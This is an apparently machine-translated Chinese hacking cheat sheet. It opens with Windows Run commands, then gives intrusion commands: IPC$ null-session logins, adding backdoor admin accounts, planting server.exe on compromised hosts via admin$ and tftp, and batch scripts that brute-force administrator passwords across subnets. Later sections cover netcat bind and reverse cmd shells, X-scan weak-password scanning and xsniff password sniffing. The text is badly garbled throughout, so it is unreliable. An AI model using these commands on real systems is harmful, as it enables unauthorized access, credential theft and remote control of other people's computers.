Run programs & Run command assist Options Access.cpl
Add Hardware Wizard Hdwwiz.cpl
Add or Remove Programs appwiz.cpl
Management Tools Control AdminTools
Automatic Update w pl.cpl bltooth File Transfer Wizard Fsquirt
Calculator Calc
Certificate Management Console Certmgr.msc
Character irradiation table Charmap
Disk Check tool CHKDSK
ClipBook Viewer CLIPBRD
Command line prompt cmd
Component Services DCOMCNFG
Computer Management Compmgmt.msc
Date and Time Properties timedate.cpl DDE shared DdeShare
Equipment manager devmgmt.msc Direct X Moderation Panel (if installed) *directx.cpl Direct X Diagnostic Tool DxDiag
Disk Cleanup Tool cleanmgr
Disk Defragmenter Dfrg.msc
Disk Management Diskmgmt.msc
Disk Partition Manager DiskPart
Display Properties Control desktop
Display Properties Desk.cpl
Display Properties Appearance tab control color Dr.Watson System Diagnostic Tool DRWTSN32 Driver Verifier Manager Verifier
Transaction Viewer Eventvwr.msc
Document Attribution Verification Sigverif
Quick Search for Findfast.cpl
Folder Options control folders
Font Folder control fonts
Font folder fonts
FreeCell Solitaire Game FreeCell
Game Moderation Joy.cpl
Group Policy Editor (XP Professional Edition) Gpedit.msc
Hearts Game mshearts IExpress wizard IExpress
Indexing Service ciadv.msc internet Properties inetcpl.cpl IP equipped with layout utility (display connection furnished) Ipconfig/all IP equipped Layout utility (displays the internal meaning of the DNS cache) Ipconfig/displaydns IP-equipped Placement utility (remove DNS cache internal significance) Ipconfig/flushdns IP equipped with placement utility (releases the DHCP-assigned dynamic IP address of the full (or specified) adapter) Ipconfig/release IP equipped layout utility ( Reassign IP addresses for all adapters) Ipconfig/renew IP-equipped placement utility (refresh DHCP and reregister DNS) Ipconfig/reg ISTERDNS IP-equipped placement utility (displays DHCP Class ID) ipconfig/ Showclassid IP equipped with layout utility (modify DHCP Class ID) ipconfig/setclassid Java Moderation Panel (if installed) Jpicpl32.cpl Java Moderation Panel (if installed) javaws
Keyboard Properties control keyboard
Local Security Settings Secpol.msc
Local Users and Groups Lusrmgr.msc
Log off from Windows logoff
Microsoft Chat Program Winchat
Minesweeper Game Winmine
Mouse Properties Control Mouse
Mouse Properties Main.cpl
Collect connection Control netconnections
Collect connection Ncpa.cpl
Collection Installation Wizard Netsetup.cpl
Notepad Notepad Nview Desktop Manager (if installed) nvtuicpl.cpl
Object Wrapper Packager ODBC value source Manager odbccp32.cpl
On-Screen Keyboard Osk AC3 decoder (if installed) ac3filter.cpl
Password attribute password.cpl
Performance Perfmon.msc
Performance Perfmon
Phone and Modem Options telephon.cpl
Power Options Properties Powercfg.cpl
Printer and fax control printers
Printer folder Printers Trtype font-e?it Quicktime (if installed) quicktime.cpl
Regional and Language Options Intl.cpl
Registry Editor Regedit
Registry Editor Regedit32
Remote Desktop MSTSC Removable Storage ntmsmgr.msc
Removable Storage operation Request Ntmsoprq.msc
Resultant Set of Policy (XP Professional Edition) Rsop.msc
Electronic scanner and camera sticpl.cpl
Task Scheduler control Schedtasks Windows Security Intermediate wscui.cpl
Service Services.msc
Sharing folder Fsmgmt.msc
Close Windows shutdown
Sound and audio equipment properties mmsys.cpl
Spider spider Card Game Spider SQL Client Client collection utility Cliconfg
System equipped with Layout editor Sysedit
System equipped with layout utility Msconfig
System File Check tool (immediately electronic scan) Sfc/scann ow system File Check tool (electronic scan on next start) sfc/scanonce System File Check tool (electronic scan on each start) Sfc/scanboot System File Check tool (return acquiescence setting) sfc/ Revert System File Check tool (root file cache) Sfc/purgecache System file Check tool (set cache size =x) sfc/cachesize=x
System Properties Sysdm.cpl
Task Manager taskmgr telnet Client Telnet
User account Management Nusrmgr.cpl
Utility Manager Utilman Windows Firewall firewall.cpl Windows Magnifier magnify Windows Management System layout wmimgmt.msc Windows system security Tools Syskey
Running Windows Update wupdmgr
Roaming Windows XP Tourstart
WordPad Write Run command Daquan
Gpedit.msc---Group Policy sndrec32---nslookup---IP address detector Explorer---Open Explorer logoff---Logoff command tsshutdn---60 second countdown shutdown command lusrmgr.msc--Native users and Groups SE Rvices.msc---Local Service settings oobe/msoobe/a--Check XP is not active notepad--open Notepad cleanmgr---spam net start messenger--begins Messenger Service compmgmt.msc---Computer Management net stop Messenger---Containment messenger Service China webmaster Information Network conf---start NetMeeting Dvdplay--dvd player charmap--startup character illumination table Diskmgmt.msc---Disk Management utility Calc---start calculator dfrg.msc---Disk Defragmenter China webmaster Information Network Chkdsk.exe---chkdsk disk check DEVMGM T.msc---equipment manager regsvr32/u*. dll--Containment DLL file run drwtsn32--system doctor rononce-p--15 seconds shutdown dxdiag---Check DirectX information regedt32---Registry Editor Msconfig.exe---System equipped with layout utility Rsop.msc---Group Policy knot Fruit set mem.exe--Display memory usage regedit.exe--Registry winchat--xp own LAN Chat progman--Program manager China webmaster Information Network WINMSD---System Information perfmon.msc--computer performance monitoring program Winver---check w indows Version Sfc/scannow---Electronic scan mistakes and restore taskmgr---Task Manager (2000/xp/2003 winver---Check Windows version wmimgmt.msc--to open the Windows Management System layout ( WMI) Wupdmgr--windows Update wscript--windows Script Host settings write--WordPad winmsd---System Information wiaacmgr---Electronic scanner and camera guide winchat--xp own LAN chat China webmaster Information Network mem.exe-- Display memory usage Msconfig.exe---system layout utility mplayer2---Easy widnows Media Player mspaint--drawing board MSTSC--Remote Desktop Connection mplayer2---Media Player magnify--Magnifier Utility mmc--Open console mobsync--sync command dxdiag---Check DirectX information drwtsn32--System Doctor devmgmt.msc---equipment manager dfrg . MSC---Disk Defragmenter diskmgmt.msc---Disk Management utility DCOMCNFG---Open the system Components service DdeShare---Open DDE sharing settings Dvdplay--dvd player net stop Messenger---Containment messenger Service net start messenger--Start Messenger Service notepad--Open notepad China webmaster Information Network nslookup---Collection Management tool Wizard ntbackup---system backup and restore Narrator---screen "commenting people" ntmsmgr.msc--Mobile Storage Manager ntmsoprq.msc---Mobile Storage Administrator action Request netstat-an--(TC) Command Check interface syncapp--Create an official letter package sysedit--system equipped with Layout editor sigverif---File signature validator sndrec32---Audio machine China webmaster Information Network China webmaster Information Network SHRP w--Create a shared folder secpol.msc---Local Security policy China Webmaster Information Network SYSKEY---System encryption, once encrypted can not be unlocked, cover windows XP system Dual Password services.msc---Local Service settings Sndvol32---Volume control program sfc.exe--System file Check sfc/ Scannow---Windows file overwatch tsshutdn---60 seconds Countdown shutdown Command TOURSTART--XP Introduction (Roaming XP program that appears after installation is complete) taskmgr--Task Manager eventvwr---transaction viewer e? It---word-of-Word Program Explorer---Open Explorer Packager---object wrapper perfmon.msc--computer performance monitoring Program progman--Program Manager China webmaster Information Network regedit.exe--Registry Rsop.msc---Group Policy result set R Egedt32---Registry Editor rononce-p--15 sec shutdown regsvr32/u*.dll--Containment DLL file run regsvr32/u zipfldr.dll--write-off zip support cmd.exe--cmd command prompt chkdsk.exe---chkdsk disk check certmgr.msc--Certificate Management Utility Calc---start calculator charmap--startup character irradiation table CLICONFG---SQL Server client Collection Utility clipbrd--Clipboard Viewer conf---start NetMeeting Compmgmt.msc---Computer Management China webmaster Information Network cleanmgr---Garbage ciadv.msc--Indexing Service osk--open Screen Keyboard odbcad32---ODBC value source Manager oobe/msoobe/ a--Check XP is not activated lusrmgr.msc--native users and Groups logoff---logout command iexpress---Trojan bundle tool, System comes with nslookup---IP address detector fsmgmt.msc---shared Folder Manager utilman--Utility Manager Gpedit.msc---Group Policy
NET use\\ip\ipc$ ""/USER: "Established IPC empty link net use\\ip\ipc$" password "/user:" username "established IPC non-empty link net use h:\\ip\c$" password "/user:" username " Direct landing after the other party C: to the local for h:net use h:\\ip\c$ after landing to illuminate each other C: to the local for h:net use\\ip\ipc$/del Delete IPC link net use H:/del Delete irradiation to the other side to the local H: exposure net User username password/add set up users net Gst/active:yes activate GST Users net user to see which users net user account name view account's properties net localgroup Administrators user name/ Add "user" to the administrator to have administrator rights, note: Administrator after the s with the plural net start to see which services net START service name open service; (e.g.: net start telnet,net start Schedule) net stop service name to suppress a service net time\\ target IP View offset time net time\\ target Ip/set set the local computer time to synchronize with the "Destination IP" host, plus the parameter/yes can write-off acknowledgment information net View view on which shared net View\\ip is turned on in the local area network to see which shared net Config Display system collection settings Net logoff broken connection on the other side of the network the shared net Pause service name pauses a service net send IP "text message" Send a message to the other network the collection connection type and information that is being used in the net. NET share view Local on-premises shared net share ipc$ on ipc$ sharing net share Ipc$/del Delete ipc$ sharing net share c$/ Del Delete C: shared net user GST 12345 with GST users log in with the password changed to 12345 net password Password change system login password netstat-a see which ports are open, common Netstat-an Netstat-n View the collection connection of the port, common Netstat-an netstat-v to see what is going on netstat-p peace talks: Netstat-p TCQ/IP View the use of a certain peace talks (see TCP/IP negotiation usage) Netstat-s View All andTalk about usage nbtstat-a IP 136 to 139 one of the ports open, you can see the other side of this login user name (03 before the user name)-Note: parameter-A to capitalize the tracert-parameter IP (or computer name) tracking route (value package), Parameter: "-W number" Used to set the time-out interval. Ping IP (or domain name) to the other host to send a tacit size of 32 bytes of value, Parameters: "-l[space" value packet sizes ";"-N send out the number of values, "-t" refers to always ping. Ping-t-l 65550 ip dead ping (send files larger than 64K and always ping as a ping to perish) ipconfig (winipcfg) for Windows NT and XP (Windows 95 98) View local IP address, Ipconfig available parameters "/all" displays full layout information tlist-t display the process items in the tree row list (for system add-ons, acquiescence is not installed, within the Support/tools folder of the installation directory) Kill-f the process entry name plus the-f parameter to force the completion of a process item (for the system's additional tools, the tacit consent is not installed, in the installation directory of the Support/tools folder) del-f file name plus the-f parameter can delete the read-only files,/ar,/ah,/as,/ AA respectively means to delete read-only, hidden, system, archive files,/a-r,/a-h,/a-s,/a-a to delete files except read-only, covert, system, archive. For example, "del/ar*.*" means deleting all read-only files in the current directory, "del/a-s*.*" means deleting all files except system files in the current directory
del/s/q directory or use: rmdir/s/q directory/S to delete all subdirectories and files under directories and directories. Use the parameter/q at the same time to delete the system confirmation when the delete operation is cancelled. (two command utility is not different) move drive letter \ path \ file name to move the path of the moved file \ moved the file name to move files, with the parameter/y will write-off to confirm that the mobile directory has a different file prompts directly covered FC One.txt Two.txt 3st.txt compare two files and output the differences to the 3st.txt file, "" and "" is the redirect command at ID number to open a registered scheduled task At/delete containment of all scheduled tasks, with the parameter/yes do not need confirmation to directly curb the at ID number/ Delete to suppress a registered scheduled task at view all scheduled Tasks At\\ip time program name (or a command)/R run the other program at some point and restart the computer finger[email protected]Check out which users have logged on to telnet IP port far and landing server, the acquiescence port for the open IP connection to IP (the command after Telnet login) Telnet on this computer directly type telnet to the native telnet copy path \ filename 1 path \ FileName 2/y Copy the file 1 to the specified directory for file 2, with the parameter/y to write off the confirmation you want to overwrite an existing directory file copy c:\srv.exe\\ip\admin$ copy the local c:\srv.exe to the other side of the admin cppy 1st.jpg/b+ 2st.txt/a 3st.jpg will 2st.txt's inner meaning hide into 1st.jpg to generate 3st.jpg new file, Note: 2st.txt file header to empty three rows, parameters:/b refers to binary files,/a refers to the ASCLL format file copy\\ip\ Admin$\svv.exe \ or: copy\\ip\admin$\*.* copy each other admini$ srv.exe files (all files) to local c:xcopy files to be copied or directory tree destination address \ Directory name copy files and directory tree, with parameters /y will not be prompted to overwrite the file tftp-i itself IP (with the meat machine as a springboard when this with the meat machine IP) get Server.exe C:\server.exe Landing, the "IP" Server.exe download to the target host C \ Server.exe parameter:-I refers to in binary mode, such as the transfer of EXE file, if not plus-I is in ASCII mode (transfer text file mode) to carry tftp-i the other IP put c:\server.exe login, upload local c: \ Server.exe to the host FTP IP port is used to upload files to the server or to hold file operations, the tacit port is 21. Bin refers to the use of binary pattern transmission (executable file); When transmitting (text file) in ASCII format, the route print shows the IP route, and will primarily display the collection address network addres, subnet mask netmask, gateway address gateways Addres, interface address interface ARP view and disposal penalty ARP cache, ARP is the meaning of the name anatomy, is responsible for the analysis of an IP into a physical MAC address. ARP-A will display full information Start Program name or command/max or/min new window and maximize (minimize) run a program or command mem View CPU usage attrib filename (directory name) view a file (directory) Properties attrib filename-a-r-s-h or +a+r+s+h remove (add) a textFiles, read-only, system, hidden properties; with + is added for a property dir to view the file, parameters:/q display files and directories belong to the system which user,/T:C display file creation time,/t:a display file last accessed time,/t:w last modified time date/t, time/ T Use this parameter, "date/t", "time/t" will only display the current date and time, and no need to enter a new date and time set specify the environment variable name = The character to assign to the variable set environment variable sets display all current environment variables set P (or other characters) display the current character p (or other characters) all environment variables on the start pause suspends the batch disposal penalty program and displays: Press any key to continue. If you perform a precondition disposition penalty in a batch disposal penalty (see the IF Command and variable) The goto label directs the cmd.exe to a labeled row in the batch disposal penalty program ( Label must be a single line, preceded by a colon, for example: ": Start" label) call path \ batch Disposition penalty file name misappropriation of another batch of disposal penalty procedure from the batch disposal penalty procedure (see call/?) For each file in a set of files, execute a specially specified command (more instructions see for command and variable) echo on or off to open or close echo, Display the current echo settings with echo without parameters The echo information is displayed on the screen echo information pass.txt save "info" to the pass.txt file findstr "Hello" Aa.txt search string in aa.txt file Hello The Find file name searches for a file, the title sign, the Change CMD window, and the color value setting of the CMD console foreground and background colors; 0 = black, 1 = blue, 2 = green, 3 = green, 4 = red, 5= violet, 6 = yellow, 7 = white, 8 = Gray, 9 = blue, a= teal, b= light green, C = red, d= light purple, e= yellowish, f= bright white prompt name change the displayed command prompt for the Cmd.exe (change C: \, d:\ to "entsky\")
VER displays version information in a DOS window winver pop-up window displays version information (memory size, system version, patch version, computer name) format drive letter/fs: Type format disk, type: FAT, FAT32, NTFS, example: Format d:/ FS:NTFS MD Directory name create directory replace source file Replace file directory replacement file ren original filename new file name rename filename tree Displays the table of contents in a tree-shaped layout. Use the parameter-F to list the file name in the first folder type filename displays the internal meaning of the text file more file name screen output file Doskey to lock command = character Doskey to unlock command = lock command for DOS (Edit command line, re-misappropriate win2k command, and create a macro). such as: Lock dir command: Doskey Dir=entsky (can not use Doskey dir=dir); Unlock: Doskey dir=taskmgr transfer it to the Service Manager chkdsk/f D: Check disk D and display status report; add parameter/ F and Repair the disk mistakes tlntadmn telnt service admn, type tlntadmn select 3, and then select 8, you can change the Telnet service acquiescence port 23 for any other port exit Cmd.exe program or at present, with parameters/ B is to exit the current batch disposal penalty script instead of Cmd.exe path \ executable file name to set a path for the executable file. CMD launches a Win2K command Interpretation window. Parameters:/eff,/en Close, open command extension; see cmd/?regedit/s Registry File name import registry; parameter/s refers to quiet mode import without any hint; regedit/ E Registry File name Export Registry cacls file name parameter displays or modifies the File access control List (ACL)-when it is formatted for NTFS. Parameter:/d Username: Set deny user access;/p user name: Perm Replace the access rights of the specified user;/g user name: Perm gives the specified user access, perm can be: N None, R read, W write, C Change (write), F pure moderation; Example: cacls d:\ TEST.TXT/D p set d:\test.txt deny P user access. cacls file name to view a list of Access user rights to files rem text inside substantive meaning add annotations to a batch disposition penalty file Netsh view or change local collection arrangement
IIS Service command: Iisreset/reboot restarts the Win2K computer (but prompts the system to restart information) Iisreset/start or stop to start (curb) all Internet services iisreset/ Restart containment and then restart all Internet Services iisreset/status display all Internet service status Iisreset/enable or disable start using on the Local System (disabled) Restart of Internet Services Iisreset/rebootonerror when the Internet service is started, curbed, or restarted, mistakes will reboot Iisreset/noforce if Internet services cannot be curbed, The Internet service will not be forced to terminate Iisreset/timeout Val does not contain Internet services when it reaches more than the time (in seconds), and if the/rebootonerror parameter is specified, the computer will reboot. The default value is 20 seconds to reboot, 60 seconds to stop, and 0 seconds to reboot. FTP command: (following the internal meaning of the representations) the command line format for FTP is: ftp-v-d-i-n-g[hostname]-v Displays all the response information for the remote server. -d Use the debug pose pattern. -N Limits FTP automatic logon, that is, the. netrc file is not used. -G write-off the global file name. help[command] or? [command] View the command description bye or quit to terminate the host FTP process entry and exit the FTP management posture. PWD Lists the current remote host directory put or send local file name [upload file name on host] Transfer local files to the remote host get or recv[ remote host filename [download to local file name] from the remote host to the local host Mget[remote-files] from the remote host to absorb a batch of files to the local host Mput local-files a batch of files from the local host to the remote host dir or ls[ Remote-directory][local-file] Lists the files in the current remote host directory. If you have a local file, write the results to a local file ASCII settings transfer files in ASCII format (default) Bin or image settings transfer files in binary format bell each time a file transfer is completed, the alarm prompts Cdup to return to the previous level of the directory shut down the FTP conversation with the remote server (corresponding to open) open Host[port] Set up the specified FTP server connection, You can specify a connection port delete Deletes a file from the remote host Mdelete[remote-files] Delete a batch of files mkdir Directory-name set up directory in the remote host Rename[from][to] Change the file name in the remote host RmDir Directory-name Delete directory status in remote host displays current FTP status system display remote host system type user User-name[password][account] re-login to the remote host with another user name [Port] re-establish a new connection prompt interactive hint mode macdef define Macro command LCD change the current local host directory, if default, go to the current user's home directory chmod change the remote host file permissions case when on, Use the Mget command to copy the file name into the local machine, all converted to lowercase letter CD Remote-dir into the remote host directory cdup into the remote host directory of the parent directory! Perform interactive shell,exit in the local machine back to the FTP environment, such as! Ls*.zip
MySQL command: mysql-h host address-u user name-p password to connect to MySQL; If you just installed MySQL, super User root does not have a password. (Example: mysql-h 123456 Note: You and root can not add a space, the other same) exit MySQL Mysqladmin-u username-p Old password password new password Change password grant select on Value library. *to User name @ Login host identified by\ "password \"; Add new user. (Note: Unlike above, the following is because it is a command in the MySQL environment, so it is followed by a semicolon as the command end) show databases; Displays the value library list. Just started with two value libraries: MySQL and test. MySQL Library is very important it has MySQL system information, we change the password and new users, the reality is to use this library to hold operations. Use mysql;show tables; Displays the Value table describe table name in the library, displays the layout of the value table create database name, build library use library name, create table table name (field setting list), build drop database name , drop table name, delete library and delete table delete from table name, empty table record Select*from table name, show table record Mysqldump--opt school school.bbb back up Value Library: (Command in DOS \\mysql \\bin directory); Note: School The value Library to the school.bbb file, school.bbb is a text file, the file name is taken, open to see if you have a new discovery. New commands under Win2003 System (utility part): shutdown/parameter shutdown or restart local or remote host. Parameter description:/s shutdown host,/R restart host,/T number set delay time, range between 0-180 seconds,/a write-off,/M//IP designated remote host. Example: shutdown/r/t 0 Restart the local host immediately (no delay) taskill/parameter The process item name or the PID of the process item terminates one or more tasks and process items. Parameter description:/pid to terminate the PID of the process entry, the tasklist command can be used to obtain the process entry name of the process entry for each process item pid,/im to terminate,/F to force the process entry to terminate,/T to terminate the specified process item and the child process entry that he initiated. TASKLIST Displays the process entry identifiers (PID) of the process items, services, and services that are currently running on local and remote hosts. Parameter description:/M listThe DLL file that is loaded by the current process item,/SVC shows the service for each process item, and only the current process item if no parameters are present.
Linux System Basic command: To distinguish between the size of the write uname display version information (with Win2K ver) dir display the current directory file, Ls-al display including hidden files (dir with Win2K) PWD Query current directory location CD CD. Go back to the previous level and note that there is a space between the CD and. Cd/returns to the root directory. Cat file name View the inside of the file the meaning of cat abc.txt to the Abc.txt file. More filenames display a text file with a page-by-page pattern. CP Copy file mv Move file RM filename Delete file, rm-a directory name delete directory and subdirectories mkdir directory name set up directory rmdir Delete subdirectories, there are no documents in the directory. chmod set file or directory Access grep searches the file for string diff file compare find File Search date now Time who query now and you use the same machine and login time location W Query the current person's details WhoAmI view their account name groups view the group of someone passwd Change Password history view itself under the command PS display process item status kill containment a process item GCC hackers usually use it to compile C language write files Su permissions convert to the specified user Telnet IP telnet connection to the other host (same win2k), When the bash$ appears, the connection is made. FTP FTP connection on a server (same as Win2K)
Attached: Batch disposal penalty commands and variables
1:for command and Variable basic format: for/parameter%variable in (set) do command[command_parameters]%variable: Specifies a Junichi letter replaceable parameter, such as:%i, while specifying a variable is used:%%i, While misappropriation of variables used:%i%, variables are divided into the size of the write (%i not equal to%i). The batch disposition penalty each can dispose the penalty the variable from%0-%9 altogether 10, in which%0 acquiesced to the batch disposition penalty file name use,%1 acquiesced to use this batch disposition penalty to enter the first value, similarly:%2-%9 refers to the input 第2-9个 value; Example: Net use\\ip\ipc$pass/ User:user IP is%1,pass to%2,user for%3
(set): Specify one or a set of files, you can use wildcards, such as: (D:\user.txt) and (1 1254) (1-1 254), {"(1 1254)" The first "1" refers to the starting value, the second "1" refers to the growth, the third "254" refers to the value of the last, namely: from 1 to 254 "(1-1 254)" Description: From 254 to 1}
Command: Specify commands for the first file, such as the net USE command, and command this:& to separate command_parameters when multiple commands are executed: Specify parameters or command-line switches for specially specified commands
In (set): Refers to the value in the (set); Do command: means the command
Parameter:/L refers to increment form {(set) as an increment when};/f refers to the constant fetching of values from a file until the closing {(set) is taken as a file, such as (D:\pass.txt)}. Example of usage: @echo off echo Usage format: Test.bat*.*.*test.txt for/l%%g in (1 1254) do echo%1.%%g test.txt&net use\\%1.%%g/ User:administrator|find "command to complete" test.txt Save as Test.bat description: A specified class C segment of the 254 IP to try to establish a administrator password is empty ipc$ connection, If Le achievement put the IP in Test.txt.
/L refers to the increment form (that is, from 1-254 or 254-1), the IP front three bits entered: *.*.* for the batch disposition penalty tacitly%1;%%g as a variable (the last of IP);& used to separate the echo and net use of the two commands; Find in the results to see whether there is a "command to complete" information;%1.%%g is the full IP address; (1 1254) refers to the starting value, the increment, the value of the knot. @echo off echo Usage format: Ok.bat IP for/f%%i in (D:\user.dic) do smb.exe%1%%i D:\pass.dic 200 Save As: Ok.exe Description: After entering an IP, use the dictionary file d:\ Pass.dic the user password in d:\user.dic until the value in the file expires. %%i is the user name;%1 is the IP address entered (acquiescence).
2:if command and Variable basic format: If[not]errorlevel Numeric command statement if the program runs and then returns an exit code equal to or greater than the specified word, the specified precondition is true. Example: the IF errorlevel 0 command refers to a command that returns a value of 0 o'clock after the execution of a program, and then executes the subsequent command if the ERRORLEVEL 1 command means that the last value returned by the program execution is not equal to 1. 0 means discovery and execution (true); 1 means no discovery, no execution (false). If[not] string 1== String 2 command statement executes the following command if the specified text string matches (that is: string 1 equals string 2). Example: "If"%2% "= =" 4 "goto start" means: If the second variable entered is 4 o'clock, execute the following command (note: When the variable is embezzled, the% variable name and "") if[not]exist the file name command statement executes the following command if the specified file name exists. Example: "If not nc.exe goto end" means: If the Nc.exe file is not found, jump to the ": End" tab. If[not]errorlevel Numeric Command Statement Else command statement or If[not] string 1== string 2 command Statement Else command statement or If[not] The exist file name command statement, the ELSE command statement, adds the following: The ELSE command statement refers to the command that follows the line else after the premise of the current polygon is not established. Note: Else must be valid on the same line as if. When there is a del command, it is necessary to enclose the DEL command in its entirety, since the DEL command can be executed on a separate line, and then it will be a separate line when used; for example: "If exist Test.txt.del test.txt.else Echo Test.txt.missing ", note the". "In the command
(ii) System external commands (all need to download the relevant tools):
1. Swiss Army Knife: Nc.exe
Parameter description:-H View Help information-D background mode-e prog program redirection, one but the connection on the execution (dangerous)-i secs delay interval-L listening mode, for inbound connection-L listening mode, the connection after the day is still continued monitoring until the Ctr+c-n IP address, can not use the domain name-o Film record 16 binary transfer-p[space] Port local port number-r random local and remote port-T using telnet interactive pattern-u P mode-v verbose output, with-VV will be more detailed-w-digit timeout delay interval-Z will input, output off (for sweep anchor) Basic usage: NC-NVV 80 Connect to the host's 80 port Nc-l-p 80 turn on the native TCP 80 port and listen for nc-nvv-w2-z 80-1024 Sweep anchor 80-1024 Port nc-l-p 5354-t-e c:winntsystem32cmd.exe bind remote host Cmdshell on remote TCP 5354 port NC-T-E C:winntsystem32cmd.exe 5354 Cmdshell and reverse connection 5354-Port Advanced usage: nc-l-p 80 as a honeypot with 1: Open and constantly listen to 80 ports, until Ctr+c cutoff nc-l-p c:\log.txt as a honeypot with 2: Open and constantly listening to the 80 port, until ctr+c, while the results output to c:\log.txt nc-l-p Honeyport.txt as a honeypot with 3-1: Open and constantly listen to 80 ports, until Ctr+c, and c:\honeyport.txt inside the real meaning into the pipeline, can also play the role of transmitting files Type.exe c:\honeyport| Nc-l-p 80 as a honeypot with 3-2: Open and constantly listen to 80 ports, until Ctr+c, and put c:\honeyport.txt inside the real meaning into the pipeline, can also play a role in the transfer of the file utility: Nc-l-p The local port on the other host: NC-E Cmd.exe native Ip-p native port *win2k nc-e/bin/sh native Ip-p native Port *linux, UNIX reverse connection break out of the other host's firewall on this machine: Nc-d-l-p the path and name of the file to be transferred on the host computer using: NC-VV native IP Local port file path and name transfer file to the other host notes: | pipe command or REDIRECT command. "", for examplesuch as: tlntadmn test.txt refers to the intrinsic meaning of the test.txt to the tlntadmn command @ To execute the command after the @, but will not be displayed (background execution); Example: @dir C:\Winnt d:\ Log.txt means: The background executes dir, and the result exists d:\log.txt in the difference "" refers to: overwrite; "" means: Save to (add to). such as: @dir C:\Winnt d:\log.txt and @dir c:\winnt d:\log.txt two commands to perform two comparison look: the use of two times the results are saved, and use: Only one result, because the second result of the first cover.
2, Sweep anchor tool: Xscan.exe
Basic format xscan-host start ip[-end IP] Detect items [other options] all host information for the "Start IP to terminate IP" segment of the sweep anchor xscan-file host list file name detection item [other options] sweep anchor "Host IP list file name" All host information in the detection project-active detection host is not alive-os detect Remote Operating system type (through NetBIOS and SNMP peace talks)-port detect port Status of common service-ftp detect FTP weak password-p Detect FTP Service Anonymous user write permissions-pop3 detect pop3-server weak password-smtp detect Smtp-server Vulnerability-sql detect sql-server weak password-smb detect nt-server weak password-iis detect IIS encoding/ Decoding vulnerability-cgi detecting CGI vulnerability-NASL loading nessus Assault Script-all detect all items above other options-I adapter number set up the collection adapter, the adapter number can be passed "-l" Parameter get-l Show all collection adapter-V Show detailed electronic scan progress-p skip unresponsive host-o Skip host not detected open port-T concurrent threads number, number of concurrent hosts specify maximum concurrent threads and number of concurrent hosts, tacit number is 100,10- Log file name Specifies the electronic scan report file name (suffix: TXT or HTML-formatted file) Usage Example Xscan-host ALL-ACTIVE-P detects all the vulnerabilities of the host in the network segment and skips the unresponsive host Xscan-host 150-o detects the canonical port status of the host in the network segment, the NT weak password user, the maximum number of concurrent threads is 150, skips a host that does not detect an open port Xscan-file Hostlist.txt-port-cgi-t 200,5-v-o detects the canonical port status of all hosts listed in the "hostlist.txt" file, CGI vulnerabilities, the maximum number of concurrent threads is 200, detects up to 5 hosts at the same time, displays detailed detection progress, Skip hosts with no open ports detected
Three, command line pattern sniffer: Xsniff.exe can capture local area network Ftp/smtp/pop3/http peace talks password parameter description-tcp output TCP Value report-P output P Value-icmp output ICMP value-pass filter password information-hide background run-host anatomy hostname-addr IP address filtering IP address-port port filter Port-log file name output saved to file-ASC output in ASCII format-hex output Usage example in 16 binary Xsniff.exe-pass-hide-log Pass.log background run sniffer password and save password information in Pass.log file xsniff.exe-tcp-p-asc-addr sniff and filter TCP and P information and output in ASCII format
4, Terminal Services password cracking: Tscrack.exe
Parameter Description-H display use help-V to display version information-s on-screen decryption capability--------------mistakes

